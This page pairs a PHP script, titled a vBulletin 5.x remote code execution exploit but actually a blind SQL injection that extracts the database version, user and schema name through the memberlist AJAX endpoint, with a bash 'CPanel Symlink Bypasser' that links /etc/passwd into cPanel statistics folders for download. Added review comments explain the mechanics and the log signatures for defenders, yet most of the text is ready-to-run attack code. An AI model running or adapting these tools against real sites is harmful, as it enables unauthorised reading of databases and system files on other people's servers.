
19/09/14

vBulletin 5.x Remote Code Execution Exploit

<?php

/*
    Author: Nytro
    Powered by: Romanian Security Team
    Price: Free. Educational.
*/


// Surface every notice and warning on stdout while the script runs.
error_reporting(E_ALL);
ini_set('display_errors', 1);


// Get arguments


// Base URL of the forum to probe: first CLI argument, otherwise the author's
// own forum is used as the default.
$target_url = 'https://rstforums.com/v5';
if (isset($argv[1])) {
    $target_url = $argv[1];
}
// The memberlist response is apparently JSON-escaped HTML in which "/" is
// written as "\/"; keep an escaped copy of the URL to match against it later.
$expression = str_replace('/', '\\/', $target_url);


// Function to send a POST request


/**
 * Send one HTTP POST with curl and return the response body.
 *
 * @param string $url    Absolute URL to post to.
 * @param string $params URL-encoded request body, handed to curl unchanged.
 * @return string|false  Response body, or false when curl_exec() fails (the
 *                       curl error text has already been printed in that case).
 */
function httpPost($url,$params)
{
    $ch = curl_init($url);


    curl_setopt($ch, CURLOPT_URL,$url); // redundant: curl_init() already took the URL
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); // return the body instead of echoing it
    curl_setopt($ch, CURLOPT_HEADER, false); // body only, response headers dropped
    // NOTE(review): certificate verification is switched off, so the TLS
    // connection gives no protection against interception; nothing visible
    // here requires that, a normally validated connection would work as well.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
   
    // Fixed headers that make the request resemble a browser's XHR call.
    // The Referer is hard-coded to the author's own forum regardless of $url,
    // and the cookie carries only bb_lastvisit/bb_lastactivity timestamps
    // (presumably to pass as a returning guest — not verified here).
    // Defender note: a Referer host that differs from the requested host is a
    // cheap log-side signal for requests produced by this helper.
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
     ));


    $output = curl_exec($ch);
   
    // NOTE(review): "== FALSE" is a loose comparison, so an empty or "0" body
    // is reported as an error too; "=== false" is the intended test. The
    // htmlspecialchars() escaping serves no purpose for a CLI script.
    if($output == FALSE) print htmlspecialchars(curl_error($ch));


    curl_close($ch);
    return $output;
}


// Function to get string between two other strings


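/**
 * Return the text between the first occurrence of $start and the next
 * occurrence of $end that follows it.
 *
 * @param string $string Haystack to search (non-strings are cast, matching
 *                       the coercion the original concatenation performed).
 * @param string $start  Opening delimiter.
 * @param string $end    Closing delimiter, searched for after $start.
 * @return string The enclosed text, or "" when either delimiter is missing.
 */
function get_string_between($string, $start, $end)
{
    $haystack = (string) $string;
    // An empty opening delimiter was treated as "not found" before (strpos
    // returned 0 and the "== 0" test fired); keep that result explicitly.
    if ($start === "") return "";
    $from = strpos($haystack, $start);
    // strpos() returns false when $start is absent. The original compared
    // "== 0" and prepended a space to tell false apart from offset 0; the
    // strict comparison makes the space trick unnecessary.
    if ($from === false) return "";
    $from += strlen($start);
    $to = strpos($haystack, $end, $from);
    // Previously a missing $end produced a negative length and returned a
    // truncated tail of the string; treat it as "no match" instead.
    if ($to === false) return "";
    return substr($haystack, $from, $to - $from);
}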


// Get version


// Despite the banner, nothing below executes code on the target: the script
// reads three strings (version(), user(), database()) one character at a time
// through a boolean-based blind SQL injection in the memberlist AJAX endpoint.
// The criteria[startswith] value apparently closes a quoted comparison, ORs in
// SUBSTR(user.username,1,1)=SUBSTR(version(),N,1) and comments out the rest
// with "--". Whenever some account's name starts with the N-th character of
// the probed string the endpoint renders that account instead of
// "No Users Matched Your Query"; securitytoken=guest shows the requests are
// unauthenticated.
// Defender note: POSTs to /ajax/render/memberlist_items whose
// criteria[startswith] contains SQL tokens (OR, SUBSTR(, --) are the
// observable signature of this probe, and the one-request-per-character
// rhythm stands out in access logs.
print "\r\nvBulletin 5.x Remote Code Execution Exploit\r\n\r\n";
print "Version: ";


// First probe: character position 1 (MySQL SUBSTR positions are 1-based).
$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


// Character position currently being probed; advanced once per iteration.
$letter = 1;


// Stop once no account matches, i.e. N has run past the end of the string.
// NOTE(review): "== false" is a loose comparison that is also true when the
// marker sits at offset 0; "=== false" is the intended test (same in the two
// loops below).
while(strpos($result, 'No Users Matched Your Query') == false)
{
    // The response appears to be JSON-escaped HTML (note \" and \/ in the
    // marker), so the split uses the escaped form of the target URL.
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    // Display name of the first listed account. If the marker is absent from
    // a response that also lacks the "no match" text, $exploded[1] is
    // undefined and PHP raises a notice here.
    $username = get_string_between($exploded[1], '">', '<\/a>');
    // Only the first character matters: by the OR condition above it should
    // equal the N-th character of version().
    print $username[0];
   
    $letter++;
    // Same payload for the next character position.
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(  ),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get user


// Same extraction for user(), the MySQL account the application connects as.
print "\r\nUser: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get database


// Same extraction for database(), the schema the application is using.
print "\r\nDatabase: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  1,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  ' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Trailing newline; the statement is terminated by the closing "?>" tag below.
print "\r\n"


?>


CPanel Symlink Bypasser

#!/bin/bash
# ______ __ ____ ___
# / ____/___ ____ _____ ___ / / / __ )__ ______ ____ ______________ _____ _ _< /
# / / / __ \/ __ `/ __ \/ _ \/ / / __ / / / / __ \/ __ `/ ___/ ___/ _ \/ ___/ | | / / /
# / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / /
# \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/
# /_/ /____/_/
############################################
# CPanel Symlink Bypasser [Public Version] #
# By Hannibal Ksa (@r00t3rz) & R3m0t3 Nu11 #
# alm3refh.com © Group XP 2014 #
############################################
#
# USAGE:
# 1. UPLOAD ME IN /home/user as Cpbypass.sh
# 2. GO TO CRON JOB
# 3. ADD THIS COMMAND:
# echo "Alm3refh bypass" ~| bash Cpbypass.sh -s "Alm3refh bypass" -- email@gmail.com
#
# email@gmail.com = your email
#
#
# THE FILE WILL SHOW YOU HOW TO SEE/DOWNLOAD YOUR SYMLINK!
# PS: ENJOY!
#
# NOTE(review): all this script does is create four symbolic links to $SYM
# under directories that cPanel's statistics tools use (tmp/analog,
# tmp/webalizer, tmp/webalizerftp, logs/), relative to the directory it is
# run from (the usage text says /home/user). The -s/-- arguments in the
# usage line are never read by the script (it inspects no positional
# parameters); presumably they belong to a mail command the usage line has
# garbled — confirm. Whether the linked file is then served through the
# cPanel interface on port 2083 is a claim of the echo text below, not
# something this script verifies.
# Defender note: the observable artefacts are a cron entry invoking a script
# like this and symlinks in those four directories whose target lies outside
# the account's home directory.
#
##########
# FILE #
##########
# Link target; the script never reads this file, it only links to it.
SYM="/etc/passwd"
########
echo ""
echo " ______ __ ____ ___"
echo " / ____/___ ____ _____ ___ / / / __ \)__ ______ ____ ______________ _____ _ _< /"
echo " / / / __ \/ __ \`/ __ \/ _ \/ / / __ / / / / __ \/ __ \`/ ___/ ___/ _ \/ ___/ | | / / / "
echo " / /___/ /_/ / /_/ / / / / __/ / / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ / | |/ / / "
echo " \____/ .___/\__,_/_/ /_/\___/_/ /_____/\__, / .___/\__,_/____/____/\___/_/ |___/_/ "
echo " /_/ /____/_/ "
echo " CPanel Symlink Bypasser [Public Version]"
echo " By Hannibal Ksa & R3m0t3 Nu11"
echo ""
echo ""
########
# Link name suffix in the range bypass100..bypass109 ($RANDOM % 10 + 100),
# so only ten distinct names are possible. The trailing ";" is harmless.
rand=bypass$(( $RANDOM % 10 + 100 ));
###
# 1st 3xpl017
###
# -s = symbolic link, -f = replace an existing entry. $SYM is unquoted, so a
# target path containing whitespace would be word-split; fine for /etc/passwd.
# tmp/analog must already exist or ln fails (the exit status is never checked).
ln -sf $SYM tmp/analog/$rand.html
echo ""
echo "1st Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/analog/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 2nd 3xpl017
###
# Same link under the webalizer statistics directory.
ln -sf $SYM tmp/webalizer/$rand.html
echo ""
echo "2nd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizer/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 3rd 3xpl017
###
# Same link under the FTP-log webalizer directory.
ln -sf $SYM tmp/webalizerftp/$rand.html
echo ""
echo "3rd Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/tmp/user/webalizerftp/$rand.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo "cpsession=cpanel user"
echo ""
###
# 4th 3xpl017
###
# This link goes under logs/ with a .doc extension. The instruction printed
# below says "bypass.doc", but the file actually created is bypass1NN.doc.
ln -sf $SYM logs/$rand.doc
echo ""
echo "4th Bypass:"
echo ""
echo "GO TO: https://yourbitch:2083/cpsession/frontend/x3/raw/index.html"
echo "yourbitch=the cpanel url"
echo "cpsession=your cpanel session"
echo ""
echo "THEN SCROLL DOWN 'TIL YOU SEE bypass.doc AND DOWNLOAD IT!"
echo ""
# DONE of the public version!
# E0F